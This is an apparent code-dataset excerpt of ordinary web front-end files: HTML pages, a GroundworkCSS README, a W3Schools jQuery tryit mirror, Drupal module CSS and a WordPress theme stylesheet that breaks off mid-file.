path stringlengths 5 312 | repo_name stringlengths 5 116 | content stringlengths 2 1.04M |
|---|---|---|
paginas/Componentes/votos/votar.html | felipelvrd/K-Heal | <!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Documento sin título</title>
<link rel="stylesheet" type="text/css" href="votos.css">
<script type="text/javascript" src="votos.js"></script>
</head>
<body>
<div id='dvVotos' title="Me Cure">
<div id='dvMecure'> <a href="#" onClick="votar('P',2);">
<p> <img src="mecure.png" width="50" height="50" alt=""/> </p>
</a>
<p><span id='spVotosMecure'>0</span></p>
</div>
<div id='dvNocure' title="No Me Cure"> <a href="#" onClick="votar('P',2);">
<p><img src="nocure.png" width="50" height="50" alt=""/></p>
</a>
<p><span id='spVotosNocure'>0</span></p>
</div>
<span id='tmp'></span>
</div>
</body>
</html>
|
src/a.css | xinlingever/NewBook | #canvas{
font-size: 48px;
font-family: serif;
}
#host{
width: 1000px;
height: 650px;
}
#progress{
width:100%;
height: 10px;
display:flex;
}
.nav-button{
width:100px;
height:40px;
}
|
readme_files/css/113-readme.html | lalo/readme-fads | <div class="announce instapaper_body md" data-path="README.md" id="readme"><article class="markdown-body entry-content" itemprop="mainContentOfPage"><p><a href="https://camo.githubusercontent.com/6ea48bf8e57beb2983a47b4e43968a8326e90238/68747470733a2f2f302e67726176617461722e636f6d2f6176617461722f63386165373430633062356637646439313333303839373461303765653032633f733d313530" target="_blank"><img src="https://camo.githubusercontent.com/6ea48bf8e57beb2983a47b4e43968a8326e90238/68747470733a2f2f302e67726176617461722e636f6d2f6176617461722f63386165373430633062356637646439313333303839373461303765653032633f733d313530" alt="Groundwork Logo" data-canonical-src="https://0.gravatar.com/avatar/c8ae740c0b5f7dd913308974a07ee02c?s=150" style="max-width:100%;"></a></p>
<h1>
<a name="user-content-groundworkcss-250" class="anchor" href="#groundworkcss-250" aria-hidden="true"><span class="octicon octicon-link"></span></a>GroundworkCSS 2.5.0</h1>
<p>Say hello to responsive design made easy.</p>
<p><a href="http://groundworkcss.github.io">http://groundworkcss.github.io</a></p>
<p><a href="http://groundworkcss.github.io">GroundworkCSS</a> is a fully responsive HTML5, CSS
and Javascript toolkit created by <a href="http://twitter.com/ghepting">@ghepting</a>.</p>
<p>Using GroundworkCSS, you can rapidly prototype and create accessible web apps that
work on virtually any device. Key features that make GroundworkCSS stand out are:</p>
<ul class="task-list">
<li>nestable, fractional, responsive, adaptive, fluid grid system</li>
<li>works on virtually anything: mobile, tablet, or large screen devices</li>
<li>built with modular Sass and CoffeeScript components</li>
<li>easy to customize</li>
<li>highly configurable</li>
<li>supports purely semantic implementations by utilizing Sass @extend, @mixin and
%placeholder classes</li>
<li>built-in ARIA role support</li>
<li>responsive text and tables</li>
<li>and much more</li>
</ul><h1>
<a name="user-content-getting-started-using-groundworkcss" class="anchor" href="#getting-started-using-groundworkcss" aria-hidden="true"><span class="octicon octicon-link"></span></a>Getting Started using GroundworkCSS</h1>
<h2>
<a name="user-content-default-build" class="anchor" href="#default-build" aria-hidden="true"><span class="octicon octicon-link"></span></a>Default Build</h2>
<p>The easiest way to incorporate GroundworkCSS into your project is to copy the
pre-compiled CSS and JS files into your project, and then refer to them in
markup. The 2 most important files are:</p>
<ul class="task-list">
<li>css/groundwork.css</li>
<li>js/groundwork.all.js</li>
</ul><p>In addition to these (required) support files:</p>
<ul class="task-list">
<li>js/libs/modernizr-2.6.2.min.js (required)</li>
<li>js/libs/jquery-1.10.2.min.js (required)</li>
<li>css/groundwork-ie.css (required for old IE compatibility)</li>
</ul><p>All in all, you may end up with markup that looks like the following:</p>
<p><strong>At the top of your HTML document (within the head section)</strong></p>
<pre><code><!-- Modernizr -->
<script src="/js/libs/modernizr-2.6.2.min.js"></script>
<!-- framework css -->
<!--[if gt IE 9]><!-->
<link type="text/css" rel="stylesheet" href="/css/groundwork.css">
<!--<![endif]-->
<!--[if lte IE 9]>
<link type="text/css" rel="stylesheet" href="/css/groundwork-core.css">
<link type="text/css" rel="stylesheet" href="/css/groundwork-type.css">
<link type="text/css" rel="stylesheet" href="/css/groundwork-ui.css">
<link type="text/css" rel="stylesheet" href="/css/groundwork-anim.css">
<link type="text/css" rel="stylesheet" href="/css/groundwork-ie.css">
<![endif]-->
</code></pre>
<p><strong>At the bottom of your HTML document (just before your closing body tag)</strong></p>
<pre><code><script type="text/javascript" src="/js/libs/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="/js/groundwork.all.js"></script>
</code></pre>
<h2>
<a name="user-content-custom-build" class="anchor" href="#custom-build" aria-hidden="true"><span class="octicon octicon-link"></span></a>Custom Build</h2>
<p>If you use Sass and you want to compile your own build of Groundwork or
integrate it along with your project code.</p>
<p>Sass source files are located in <strong>src/sass</strong> and <strong>src/coffee</strong>.</p>
<p>Important files to edit are:</p>
<ul class="task-list">
<li>groundwork.sass: dictates which modules are imported for compilation
(delete/comment out unneeded modules).</li>
<li>_settings.sass: initial settings for Groundwork, including customizable
colors, options to turn off rapid prototyping classes and much more.</li>
</ul><p>You can then output your own groundwork[.css/.js], or import groundwork.sass
as part of your project's Sass. The latter lets you utilise GroundworkCSS's
library through <code>@include</code> or <code>@extend</code> for your custom classes.</p>
<h2>
<a name="user-content-ruby-on-rails" class="anchor" href="#ruby-on-rails" aria-hidden="true"><span class="octicon octicon-link"></span></a>Ruby on Rails</h2>
<p>If you're using Groundwork in a Ruby on Rails project, definitely use the
<a href="http://github.com/groundworkcss/groundworkcss-rails">groundworkcss-rails gem</a></p>
<h2>
<a name="user-content-want-to-develop-on-and-contribute-to-groundworkcss" class="anchor" href="#want-to-develop-on-and-contribute-to-groundworkcss" aria-hidden="true"><span class="octicon octicon-link"></span></a>Want to develop on and contribute to GroundworkCSS?</h2>
<p>Read <a href="https://github.com/groundworkcss/groundwork/wiki/Contributing-to-Groundwork">Contributing to Groundwork</a> and fork away! :)</p></article></div> |
docs/SimpletestDocumentation/drupal-simpletest/html/search/classes_6e.html | chachasikes/TwinCitiesTestSprint | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title></title>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<link rel="stylesheet" type="text/css" href="search.css"/>
<script type="text/javascript" src="search.js"></script>
</head>
<body class="SRPage">
<div id="SRIndex">
<div class="SRStatus" id="Loading">Loading...</div>
<div class="SRResult" id="SR_nestingcasetag">
<div class="SREntry">
<a id="Item0" onkeydown="return searchResults.Nav(event,0)" onkeypress="return searchResults.Nav(event,0)" onkeyup="return searchResults.Nav(event,0)" class="SRSymbol" href="../class_nesting_case_tag.html" target="_parent">NestingCaseTag</a>
</div>
</div>
<div class="SRResult" id="SR_nestinggrouptag">
<div class="SREntry">
<a id="Item1" onkeydown="return searchResults.Nav(event,1)" onkeypress="return searchResults.Nav(event,1)" onkeyup="return searchResults.Nav(event,1)" class="SRSymbol" href="../class_nesting_group_tag.html" target="_parent">NestingGroupTag</a>
</div>
</div>
<div class="SRResult" id="SR_nestingmethodtag">
<div class="SREntry">
<a id="Item2" onkeydown="return searchResults.Nav(event,2)" onkeypress="return searchResults.Nav(event,2)" onkeyup="return searchResults.Nav(event,2)" class="SRSymbol" href="../class_nesting_method_tag.html" target="_parent">NestingMethodTag</a>
</div>
</div>
<div class="SRResult" id="SR_nestingxmltag">
<div class="SREntry">
<a id="Item3" onkeydown="return searchResults.Nav(event,3)" onkeypress="return searchResults.Nav(event,3)" onkeyup="return searchResults.Nav(event,3)" class="SRSymbol" href="../class_nesting_xml_tag.html" target="_parent">NestingXmlTag</a>
</div>
</div>
<div class="SRResult" id="SR_nohttpheaderexpectation">
<div class="SREntry">
<a id="Item4" onkeydown="return searchResults.Nav(event,4)" onkeypress="return searchResults.Nav(event,4)" onkeyup="return searchResults.Nav(event,4)" class="SRSymbol" href="../class_no_http_header_expectation.html" target="_parent">NoHttpHeaderExpectation</a>
</div>
</div>
<div class="SRResult" id="SR_nopatternexpectation">
<div class="SREntry">
<a id="Item5" onkeydown="return searchResults.Nav(event,5)" onkeypress="return searchResults.Nav(event,5)" onkeyup="return searchResults.Nav(event,5)" class="SRSymbol" href="../class_no_pattern_expectation.html" target="_parent">NoPatternExpectation</a>
</div>
</div>
<div class="SRResult" id="SR_noskipsreporter">
<div class="SREntry">
<a id="Item6" onkeydown="return searchResults.Nav(event,6)" onkeypress="return searchResults.Nav(event,6)" onkeyup="return searchResults.Nav(event,6)" class="SRSymbol" href="../class_no_skips_reporter.html" target="_parent">NoSkipsReporter</a>
</div>
</div>
<div class="SRResult" id="SR_notaexpectation">
<div class="SREntry">
<a id="Item7" onkeydown="return searchResults.Nav(event,7)" onkeypress="return searchResults.Nav(event,7)" onkeyup="return searchResults.Nav(event,7)" class="SRSymbol" href="../class_not_a_expectation.html" target="_parent">NotAExpectation</a>
</div>
</div>
<div class="SRResult" id="SR_notequalexpectation">
<div class="SREntry">
<a id="Item8" onkeydown="return searchResults.Nav(event,8)" onkeypress="return searchResults.Nav(event,8)" onkeyup="return searchResults.Nav(event,8)" class="SRSymbol" href="../class_not_equal_expectation.html" target="_parent">NotEqualExpectation</a>
</div>
</div>
<div class="SRResult" id="SR_notextexpectation">
<div class="SREntry">
<a id="Item9" onkeydown="return searchResults.Nav(event,9)" onkeypress="return searchResults.Nav(event,9)" onkeyup="return searchResults.Nav(event,9)" class="SRSymbol" href="../class_no_text_expectation.html" target="_parent">NoTextExpectation</a>
</div>
</div>
<div class="SRResult" id="SR_notidenticalexpectation">
<div class="SREntry">
<a id="Item10" onkeydown="return searchResults.Nav(event,10)" onkeypress="return searchResults.Nav(event,10)" onkeyup="return searchResults.Nav(event,10)" class="SRSymbol" href="../class_not_identical_expectation.html" target="_parent">NotIdenticalExpectation</a>
</div>
</div>
<div class="SRStatus" id="Searching">Searching...</div>
<div class="SRStatus" id="NoMatches">No Matches</div>
<script type="text/javascript"><!--
document.getElementById("Loading").style.display="none";
document.getElementById("NoMatches").style.display="none";
var searchResults = new SearchResults("searchResults");
searchResults.Search();
--></script>
</div>
</body>
</html>
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jquery/tryitab86.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/jquery/tryit.asp?filename=tryjquery_traversing_closest_dom by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:15:56 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navigator.userAgent.match(/iPad/i) ) {
document.getElementById('viewport').setAttribute("content", "width=device-width, initial-scale=0.9");
}
}());
</script>
<link rel="stylesheet" href="../trycss.css">
<!--[if lt IE 8]>
<style>
.textareacontainer, .iframecontainer {width:48%;}
.textarea, .iframe {height:800px;}
#textareaCode, #iframeResult {height:700px;}
.menu img {display:none;}
</style>
<![endif]-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','../../www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-3855518-1', 'auto');
ga('require', 'displayfeatures');
ga('send', 'pageview');
</script>
<script>
var googletag = googletag || {};
googletag.cmd = googletag.cmd || [];
(function() {
var gads = document.createElement('script');
gads.async = true;
gads.type = 'text/javascript';
var useSSL = 'https:' == document.location.protocol;
gads.src = (useSSL ? 'https:' : 'http:') +
'//www.googletagservices.com/tag/js/gpt.js';
var node = document.getElementsByTagName('script')[0];
node.parentNode.insertBefore(gads, node);
})();
</script>
<script>
googletag.cmd.push(function() {
googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads());
googletag.pubads().setTargeting("content","tryjquery");
googletag.pubads().enableSingleRequest();
googletag.enableServices();
});
</script>
<script type="text/javascript">
function submitTryit()
{
var t=document.getElementById("textareaCode").value;
t=t.replace(/=/gi,"w3equalsign");
var pos=t.search(/script/i)
while (pos>0)
{
t=t.substring(0,pos) + "w3" + t.substr(pos,3) + "w3" + t.substr(pos+3,3) + "tag" + t.substr(pos+6);
pos=t.search(/script/i);
}
if ( navigator.userAgent.match(/Safari/i) ) {
t=escape(t);
document.getElementById("bt").value="1";
}
document.getElementById("code").value=t;
document.getElementById("tryitform").action="tryit_view52a0.html?x=" + Math.random();
validateForm();
document.getElementById("iframeResult").contentWindow.name = "view";
document.getElementById("tryitform").submit();
}
function validateForm()
{
var code=document.getElementById("code").value;
if (code.length>8000)
{
document.getElementById("code").value="<h1>Error</h1>";
}
}
</script>
<style>
</style>
</head>
<body>
<div id="ads">
<div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;">
<div style="width:974px;height:94px;position:relative;margin:0px;margin-top:5px;margin-bottom:5px;margin-right:auto;margin-left:auto;padding:0px;overflow:hidden;">
<!-- TryitLeaderboard -->
<div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); });
</script>
</div>
<div style="clear:both"></div>
</div>
</div>
</div>
<div class="container">
<div class="textareacontainer">
<div class="textarea">
<div class="headerText" style="width:auto;float:left;">Edit This Code:</div>
<div class="headerBtnDiv" style="width:auto;float:right;margin-top:8px;margin-right:2.4%;"><button class="submit" type="button" onclick="submitTryit()">See Result »</button></div>
<div class="textareawrapper">
<textarea autocomplete="off" class="code_input" id="textareaCode" wrap="logical" xrows="30" xcols="50"><!DOCTYPE html>
<html>
<head>
<style>
.ancestors *
{
display: block;
border: 2px solid lightgrey;
color: lightgrey;
padding: 5px;
margin: 15px;
}
</style>
<script src="../../ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script>
$(document).ready(function(){
var listItemII=document.getElementById("dom");
$("li").closest("ul",listItemII).css({"color":"red","border":"2px solid red"});
});
</script>
</head>
<body class="ancestors">body (great-great-grandparent)
<div style="width:500px;">div (great-grandparent)
<ul id="dom">ul (second ancestor - second grandparent)
<ul id="dom">ul (first ancestor - first grandparent)
<li>li (direct parent)
<span>span</span>
</li>
</ul>
</ul>
</div>
</body>
<!-- Mirrored from www.w3schools.com/jquery/tryit.asp?filename=tryjquery_traversing_closest_dom by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:15:56 GMT -->
</html>
</textarea>
<form autocomplete="off" style="margin:0px;display:none;" action="http://www.w3schools.com/jquery/tryit_view.asp" method="post" target="view" id="tryitform" name="tryitform" onsubmit="validateForm();">
<input type="hidden" name="code" id="code" />
<input type="hidden" id="bt" name="bt" />
</form>
</div>
</div>
</div>
<div class="iframecontainer">
<div class="iframe">
<div class="headerText resultHeader">Result:</div>
<div class="iframewrapper">
<iframe id="iframeResult" class="result_output" frameborder="0" name="view" xsrc="tryjquery_traversing_closest_dom.html"></iframe>
</div>
<div class="footerText">Try it Yourself - © <a href="../index.html">w3schools.com</a></div>
</div>
</div>
</div>
<script>submitTryit()</script>
</body>
</html> |
modules/contrib/environment_indicator/css/environment_indicator.css | davidlfg/d8-study | #environment-indicator {
text-align: center;
white-space: nowrap;
color: white;
text-shadow: 0 -1px 1px #333;
font-weight: bold;
z-index: 10;
left: 0;
right: 0;
padding: 5px;
background-image: linear-gradient(bottom, rgba(207,207,207,0.3) 19%, rgba(250,250,250,0.3) 60%, rgba(255,255,255,0.3) 80%);
background-image: -o-linear-gradient(bottom, rgba(207,207,207,0.3) 19%, rgba(250,250,250,0.3) 60%, rgba(255,255,255,0.3) 80%);
background-image: -moz-linear-gradient(bottom, rgba(207,207,207,0.3) 19%, rgba(250,250,250,0.3) 60%, rgba(255,255,255,0.3) 80%);
background-image: -webkit-linear-gradient(bottom, rgba(207,207,207,0.3) 19%, rgba(250,250,250,0.3) 60%, rgba(255,255,255,0.3) 80%);
background-image: -ms-linear-gradient(bottom, rgba(207,207,207,0.3) 19%, rgba(250,250,250,0.3) 60%, rgba(255,255,255,0.3) 80%);
background-image: -webkit-gradient(
linear,
left bottom,
left top,
color-stop(0.19, rgba(207,207,207,0.3)),
color-stop(0.6, rgba(250,250,250,0.3)),
color-stop(0.8, rgba(255,255,255,0.3))
);
}
#environment-indicator .description { font-size: 0.85em; }
#environment-indicator .description::before { content: "("; }
#environment-indicator .description::after { content: ")"; }
#environment-indicator ul { overflow: hidden; margin: 0; }
#environment-indicator ul.environment-switcher-container li {
list-style: none;
float: left;
}
#environment-indicator ul.environment-switcher-container li a {
margin: 0 3px;
padding: 3px 8px;
-moz-border-radius: 15px;
-webkit-border-radius: 15px;
border-radius: 15px;
font-size: 0.8em;
text-shadow: none;
border: none;
}
#environment-indicator ul.environment-switcher-container li a:hover {
background-color: #DDD;
-moz-box-shadow: inset 0 1px 5px #333;
-webkit-box-shadow: inset 0 1px 5px #333;
-o-box-shadow: inset 0 1px 5px #333;
box-shadow: inset 0 1px 5px #333;
}
#environment-indicator ul.environment-switcher-container {
display: none;
padding: 8px 10px 6px 10px;
margin-top: 1px;
}
.environment-indicator-color {
font-size: 1em;
text-align: center;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
-o-border-radius: 5px;
border-radius: 5px;
background-color: #EDEDE0;
}
.toolbar-bar .toolbar-icon-environment:before {
background-image: url("../images/env-bebebe.svg");
}
.no-svg .toolbar-bar .toolbar-icon-environment:before {
background-image: url("../images/env-bebebe.png");
}
.toolbar-bar .toolbar-icon-environment.is-active:before {
background-image: url("../images/env-ffffff.svg");
}
.no-svg .toolbar-bar .toolbar-icon-environment.is-active:before {
background-image: url("../images/env-ffffff.png");
}
.toolbar .toolbar-tray-vertical .edit-environments {
text-align: right;
padding: 1em;
}
.toolbar .toolbar-tray-horizontal .edit-environments {
float: right;
}
|
style.css | richardplacide/techcontinuum1_s | /*
Theme Name: techcontinuum1_s
Theme URI: http://underscores.me/
Author: Richard Placide
Author URI: http://ww.techcontinuum.com/
Description: Description
Version: 1.0
License: GNU General Public License
License URI: license.txt
Tags:
*/
/* =Reset
-------------------------------------------------------------- */
html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, address, big, cite, code,
del, dfn, em, font, ins, kbd, q, s, samp,
small, strike, strong, sub, sup, tt, var,
dl, dt, dd, ol, ul, li,
fieldset, form, label, legend,
table, caption, tbody, tfoot, thead, tr, th, td {
border: 0;
font-family: inherit;
font-size: 100%;
font-style: inherit;
font-weight: inherit;
margin: 0;
outline: 0;
padding: 0;
vertical-align: baseline;
}
html {
font-size: 62.5%; /* Corrects text resizing oddly in IE6/7 when body font-size is set using em units http://clagnut.com/blog/348/#c790 */
overflow-y: scroll; /* Keeps page centred in all browsers regardless of content height */
-webkit-text-size-adjust: 100%; /* Prevents iOS text size adjust after orientation change, without disabling user zoom */
-ms-text-size-adjust: 100%; /* www.456bereastreet.com/archive/201012/controlling_text_size_in_safari_for_ios_without_disabling_user_zoom/ */
}
body {
background: #fff;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
nav,
section {
display: block;
}
ol, ul {
list-style: none;
}
table { /* tables still need 'cellspacing="0"' in the markup */
border-collapse: separate;
border-spacing: 0;
}
caption, th, td {
font-weight: normal;
text-align: left;
}
blockquote:before, blockquote:after,
q:before, q:after {
content: "";
}
blockquote, q {
quotes: "" "";
}
a:focus {
outline: thin dotted;
}
a:hover,
a:active { /* Improves readability when focused and also mouse hovered in all browsers people.opera.com/patrickl/experiments/keyboard/test */
outline: 0;
}
a img {
border: 0;
}
/* =Global
----------------------------------------------- */
body,
button,
input,
select,
textarea {
color: #404040;
font-family: sans-serif;
font-size: 16px;
font-size: 1.6rem;
line-height: 1.5;
}
/* Headings */
h1,h2,h3,h4,h5,h6 {
clear: both;
}
hr {
background-color: #ccc;
border: 0;
height: 1px;
margin-bottom: 1.5em;
}
/* Text elements */
p {
margin-bottom: 1.5em;
}
ul, ol {
margin: 0 0 1.5em 3em;
}
ul {
list-style: disc;
}
ol {
list-style: decimal;
}
li > ul,
li > ol {
margin-bottom: 0;
margin-left: 1.5em;
}
dt {
font-weight: bold;
}
dd {
margin: 0 1.5em 1.5em;
}
b, strong {
font-weight: bold;
}
dfn, cite, em, i {
font-style: italic;
}
blockquote {
margin: 0 1.5em;
}
address {
margin: 0 0 1.5em;
}
pre {
background: #eee;
font-family: "Courier 10 Pitch", Courier, monospace;
font-size: 15px;
font-size: 1.5rem;
line-height: 1.6;
margin-bottom: 1.6em;
padding: 1.6em;
overflow: auto;
max-width: 100%;
}
code, kbd, tt, var {
font: 15px Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace;
}
abbr, acronym {
border-bottom: 1px dotted #666;
cursor: help;
}
mark, ins {
background: #fff9c0;
text-decoration: none;
}
sup,
sub {
font-size: 75%;
height: 0;
line-height: 0;
position: relative;
vertical-align: baseline;
}
sup {
bottom: 1ex;
}
sub {
top: .5ex;
}
small {
font-size: 75%;
}
big {
font-size: 125%;
}
figure {
margin: 0;
}
table {
margin: 0 0 1.5em;
width: 100%;
}
th {
font-weight: bold;
}
button,
input,
select,
textarea {
font-size: 100%; /* Corrects font size not being inherited in all browsers */
margin: 0; /* Addresses margins set differently in IE6/7, F3/4, S5, Chrome */
vertical-align: baseline; /* Improves appearance and consistency in all browsers */
*vertical-align: middle; /* Improves appearance and consistency in all browsers */
}
button,
input {
line-height: normal; /* Addresses FF3/4 setting line-height using !important in the UA stylesheet */
*overflow: visible; /* Corrects inner spacing displayed oddly in IE6/7 */
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
border: 1px solid #ccc;
border-color: #ccc #ccc #bbb #ccc;
border-radius: 3px;
background: #e6e6e6;
-webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.5), inset 0 15px 17px rgba(255, 255, 255, 0.5), inset 0 -5px 12px rgba(0, 0, 0, 0.05);
-moz-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.5), inset 0 15px 17px rgba(255, 255, 255, 0.5), inset 0 -5px 12px rgba(0, 0, 0, 0.05);
box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.5), inset 0 15px 17px rgba(255, 255, 255, 0.5), inset 0 -5px 12px rgba(0, 0, 0, 0.05);
color: rgba(0, 0, 0, .8);
cursor: pointer; /* Improves usability and consistency of cursor style between image-type 'input' and others */
-webkit-appearance: button; /* Corrects inability to style clickable 'input' types in iOS */
font-size: 12px;
font-size: 1.2rem;
line-height: 1;
padding: .6em 1em .4em;
text-shadow: 0 1px 0 rgba(255, 255, 255, 0.8);
}
button:hover,
html input[type="button"]:hover,
input[type="reset"]:hover,
input[type="submit"]:hover {
border-color: #ccc #bbb #aaa #bbb;
-webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.8), inset 0 15px 17px rgba(255, 255, 255, 0.8), inset 0 -5px 12px rgba(0, 0, 0, 0.02);
-moz-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.8), inset 0 15px 17px rgba(255, 255, 255, 0.8), inset 0 -5px 12px rgba(0, 0, 0, 0.02);
box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.8), inset 0 15px 17px rgba(255, 255, 255, 0.8), inset 0 -5px 12px rgba(0, 0, 0, 0.02);
}
button:focus,
html input[type="button"]:focus,
input[type="reset"]:focus,
input[type="submit"]:focus,
button:active,
html input[type="button"]:active,
input[type="reset"]:active,
input[type="submit"]:active {
border-color: #aaa #bbb #bbb #bbb;
-webkit-box-shadow: inset 0 -1px 0 rgba(255, 255, 255, 0.5), inset 0 2px 5px rgba(0, 0, 0, 0.15);
-moz-box-shadow: inset 0 -1px 0 rgba(255, 255, 255, 0.5), inset 0 2px 5px rgba(0, 0, 0, 0.15);
box-shadow: inset 0 -1px 0 rgba(255, 255, 255, 0.5), inset 0 2px 5px rgba(0, 0, 0, 0.15);
}
input[type="checkbox"],
input[type="radio"] {
box-sizing: border-box; /* Addresses box sizing set to content-box in IE8/9 */
padding: 0; /* Addresses excess padding in IE8/9 */
}
input[type="search"] {
-webkit-appearance: textfield; /* Addresses appearance set to searchfield in S5, Chrome */
-webkit-box-sizing: content-box; /* Addresses box sizing set to border-box in S5, Chrome (include -moz to future-proof) */
-moz-box-sizing: content-box;
box-sizing: content-box;
}
input[type="search"]::-webkit-search-decoration { /* Corrects inner padding displayed oddly in S5, Chrome on OSX */
-webkit-appearance: none;
}
button::-moz-focus-inner,
input::-moz-focus-inner { /* Corrects inner padding and border displayed oddly in FF3/4 www.sitepen.com/blog/2008/05/14/the-devils-in-the-details-fixing-dojos-toolbar-buttons/ */
border: 0;
padding: 0;
}
input[type="text"],
input[type="email"],
input[type="password"],
input[type="search"],
textarea {
color: #666;
border: 1px solid #ccc;
border-radius: 3px;
}
input[type="text"]:focus,
input[type="email"]:focus,
input[type="password"]:focus,
input[type="search"]:focus,
textarea:focus {
color: #111;
}
input[type="text"],
input[type="email"],
input[type="password"],
input[type="search"] {
padding: 3px;
}
textarea {
overflow: auto; /* Removes default vertical scrollbar in IE6/7/8/9 */
padding-left: 3px;
vertical-align: top; /* Improves readability and alignment in all browsers */
width: 98%;
}
/* Links */
a {
color: royalblue;
}
a:visited {
color: purple;
}
a:hover,
a:focus,
a:active {
color: midnightblue;
}
/* Alignment */
.alignleft {
display: inline;
float: left;
margin-right: 1.5em;
}
.alignright {
display: inline;
float: right;
margin-left: 1.5em;
}
.aligncenter {
clear: both;
display: block;
margin: 0 auto;
}
/* Text meant only for screen readers */
.screen-reader-text {
clip: rect(1px, 1px, 1px, 1px);
position: absolute !important;
}
.screen-reader-text:hover,
.screen-reader-text:active,
.screen-reader-text:focus {
background-color: #f1f1f1;
border-radius: 3px;
box-shadow: 0 0 2px 2px rgba(0, 0, 0, 0.6);
clip: auto !important;
color: #21759b;
display: block;
font-size: 14px;
font-weight: bold;
height: auto;
left: 5px;
line-height: normal;
padding: 15px 23px 14px;
text-decoration: none;
top: 5px;
width: auto;
z-index: 100000; /* Above WP toolbar */
}
/* Clearing */
.clear:before,
.clear:after,
[class*="content"]:before,
[class*="content"]:after,
[class*="site"]:before,
[class*="site"]:after {
content: '';
display: table;
}
.clear:after,
[class*="content"]:after,
[class*="site"]:after {
clear: both;
}
/* =Menu
----------------------------------------------- */
.navigation-main {
/*clear: both;*/
display: block;
/*float: left;*/
width: 100%;
}
.navigation-main ul {
list-style: none;
margin: 0;
padding-left: 0;
}
.navigation-main li {
float: left;
position: relative;
margin-right: 0.2em;
}
.navigation-main a {
display: block;
text-decoration: none;
color:#fff;
}
.navigation-main ul ul {
-webkit-box-shadow: 0 3px 3px rgba(0, 0, 0, 0.2);
-moz-box-shadow: 0 3px 3px rgba(0, 0, 0, 0.2);
box-shadow: 0 3px 3px rgba(0, 0, 0, 0.2);
display: none;
float: left;
position: absolute;
top: 1.5em;
left: 0;
z-index: 99999;
}
.navigation-main ul ul ul {
left: 100%;
top: 0;
}
.navigation-main ul ul a {
width: 200px;
}
.navigation-main ul ul li {
}
.navigation-main li:hover > a {
}
.navigation-main ul ul :hover > a {
}
.navigation-main ul ul a:hover {
}
.navigation-main ul li:hover > ul {
display: block;
}
.navigation-main li.current_page_item a,
.navigation-main li.current-menu-item a {
}
/* Small menu */
.menu-toggle {
display: none;
cursor: pointer;
}
.main-small-navigation ul {
display: none;
}
@media screen and (max-width: 600px) {
.menu-toggle,
.main-small-navigation ul.nav-menu.toggled-on {
display: block;
}
.navigation-main ul {
display: none;
}
}
/* =Content
----------------------------------------------- */
.sticky {
}
.hentry {
margin: 0 0 1.5em;
}
.byline {
display: none;
}
.single .byline,
.group-blog .byline {
display: inline;
}
.entry-content,
.entry-summary {
margin: 1.5em 0 0;
}
.page-links {
clear: both;
margin: 0 0 1.5em;
}
/* =Asides
----------------------------------------------- */
.blog .format-aside .entry-title,
.archive .format-aside .entry-title {
display: none;
}
/* =Media
----------------------------------------------- */
.site-header img,
.entry-content img,
.comment-content img,
.widget img {
max-width: 100%; /* Fluid images for posts, comments, and widgets */
}
.site-header img,
.entry-content img,
.comment-content img[height],
img[class*="align"],
img[class*="wp-image-"] {
height: auto; /* Make sure images with WordPress-added height and width attributes are scaled correctly */
}
.site-header img,
.entry-content img,
img.size-full {
max-width: 100%;
width: auto; /* Prevent stretching of full-size images with height and width attributes in IE8 */
}
.entry-content img.wp-smiley,
.comment-content img.wp-smiley {
border: none;
margin-bottom: 0;
margin-top: 0;
padding: 0;
}
.wp-caption {
border: 1px solid #ccc;
margin-bottom: 1.5em;
max-width: 100%;
}
.wp-caption img[class*="wp-image-"] {
display: block;
margin: 1.2% auto 0;
max-width: 98%;
}
.wp-caption-text {
text-align: center;
}
.wp-caption .wp-caption-text {
margin: 0.8075em 0;
}
.site-content .gallery {
margin-bottom: 1.5em;
}
.gallery-caption {
}
.site-content .gallery a img {
border: none;
height: auto;
max-width: 90%;
}
.site-content .gallery dd {
margin: 0;
}
.site-content .gallery-columns-4 .gallery-item {
}
.site-content .gallery-columns-4 .gallery-item img {
}
/* Make sure embeds and iframes fit their containers */
embed,
iframe,
object {
max-width: 100%;
}
/* =Navigation
----------------------------------------------- */
.site-content [class*="navigation"] {
margin: 0 0 1.5em;
overflow: hidden;
}
[class*="navigation"] .previous {
float: left;
width: 50%;
}
[class*="navigation"] .next {
float: right;
text-align: right;
width: 50%;
}
/* =Comments
----------------------------------------------- */
.comment-content a {
word-wrap: break-word;
}
.bypostauthor {
}
/* =Widgets
----------------------------------------------- */
.widget {
